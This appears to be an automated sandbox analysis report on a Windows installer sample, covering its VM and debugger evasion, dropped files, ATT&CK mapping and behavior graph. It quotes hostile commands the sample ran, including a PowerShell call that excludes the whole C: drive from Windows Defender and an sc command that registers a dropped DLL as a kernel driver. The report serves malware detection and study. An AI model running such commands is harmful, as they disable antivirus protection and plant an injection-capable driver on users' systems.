Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6521Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3266Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpWindow / User API: threadDelayed 600Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpWindow / User API: threadDelayed 553Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpWindow / User API: threadDelayed 502Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GMAHF.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0I4KI.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0I4KI.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GMAHF.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1020Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C0AB430 FindFirstFileA,FindClose,7_2_6C0AB430
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_003C6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,11_2_003C6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_003C7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,11_2_003C7496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_003C9C60 GetSystemInfo,11_2_003C9C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000002.2186157402.0000000000E1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Ja
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000002.2186157402.0000000000E1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Contains functionality to hide a thread from the debugger
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6BF33886 NtSetInformationThread 00000000,00000011,00000000,000000007_2_6BF33886
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C0C06F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6C0C06F1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_004457D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,11_2_004457D0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C0BF6ED mov eax, dword ptr fs:[00000030h]7_2_6C0BF6ED
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C0CA2A5 mov eax, dword ptr fs:[00000030h]7_2_6C0CA2A5
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C0CA2D6 mov eax, dword ptr fs:[00000030h]7_2_6C0CA2D6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C0C06F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6C0C06F1
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C0B922D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_6C0B922D

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Found driver which could be used to inject code into processes
Source: tProtect.dll.13.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C187700 cpuid 7_2_6C187700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_003CAB2A GetSystemTimeAsFileTime,11_2_003CAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00460090 GetVersion,11_2_00460090

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
Windows Service		1
Access Token Manipulation		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Service Execution		1
DLL Side-Loading		1
Windows Service		1
Disable or Modify Tools		LSASS Memory421
Security Software Discovery		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API		Logon Script (Windows)111
Process Injection		231
Virtualization/Sandbox Evasion		Security Account Manager231
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading		1
Access Token Manipulation		NTDS2
Process Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information		Cached Domain Credentials2
System Owner/User Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information		DCSync3
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing		Proc Filesystem25
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1580391 Sample: #U5b89#U88c5#U52a9#U624b2.0.3.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 84 96 Multi AV Scanner detection for dropped file 2->96 98 Found driver which could be used to inject code into processes 2->98 100 PE file contains section with special chars 2->100 102 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->102 10 #U5b89#U88c5#U52a9#U624b2.0.3.exe 2 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        17 29 other processes 2->17 process3 file4 94 C:\...\#U5b89#U88c5#U52a9#U624b2.0.3.tmp, PE32 10->94 dropped 19 #U5b89#U88c5#U52a9#U624b2.0.3.tmp 3 5 10->19         started        23 sc.exe 13->23         started        25 sc.exe 1 15->25         started        27 sc.exe 1 17->27         started        29 sc.exe 1 17->29         started        31 sc.exe 1 17->31         started        33 25 other processes 17->33 process5 file6 80 C:\Users\user\AppData\Local\...\update.vac, PE32 19->80 dropped 82 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->82 dropped 104 Adds a directory exclusion to Windows Defender 19->104 35 #U5b89#U88c5#U52a9#U624b2.0.3.exe 2 19->35         started        38 powershell.exe 23 19->38         started        41 conhost.exe 23->41         started        43 conhost.exe 25->43         started        45 conhost.exe 27->45         started        47 conhost.exe 29->47         started        49 conhost.exe 31->49         started        51 conhost.exe 33->51         started        53 24 